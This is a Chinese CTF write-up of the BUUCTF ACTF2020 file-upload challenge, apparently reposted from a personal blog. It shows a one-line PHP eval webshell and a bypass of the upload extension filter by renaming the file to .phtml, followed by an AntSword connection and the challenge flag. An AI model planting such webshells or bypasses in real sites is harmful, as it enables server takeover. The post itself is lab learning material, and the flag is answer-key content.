标签:文件 ACTF2020 Buuctf Upload 后缀名 flag 源代码 上传 图片
文章目录
一、检查源代码
拿到题目之后,我们首先对页面源代码就行检查,源代码查看之后并没有发现提示或者有用线索,所以我们只能回到文件上传中找答案。
二、文件上传
1、先尝试图片是否能够上传
首先,我们尝试上传一张图片,发现图片上传成功
2、burpsuit抓包、改包
注:这是我准备的一句话木马,用来上传图片的
<script language='php'>eval($_POST['a']);</script>
当我们把上传图片后缀名改为PHP是,网页右上角显示了nonono~ Bad file!所以我们把文件后缀名改为phtml上传,文件上传成功。
3、使用antsword进行连接,获取flag
http://a1fb3d86-c636-4d5a-a7b3-2cfbe8bd466b.node4.buuoj.cn/uplo4d/ad898f6bf1eda88f1ca04a806209e28d.phtml
flag{bbd330b4-4ce9-4e11-9614-2de4ce5865b0}
注:2021/10/28
标签:文件,ACTF2020,Buuctf,Upload,后缀名,flag,源代码,上传,图片 来源: https://blog.csdn.net/qq_53030229/article/details/121025399
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。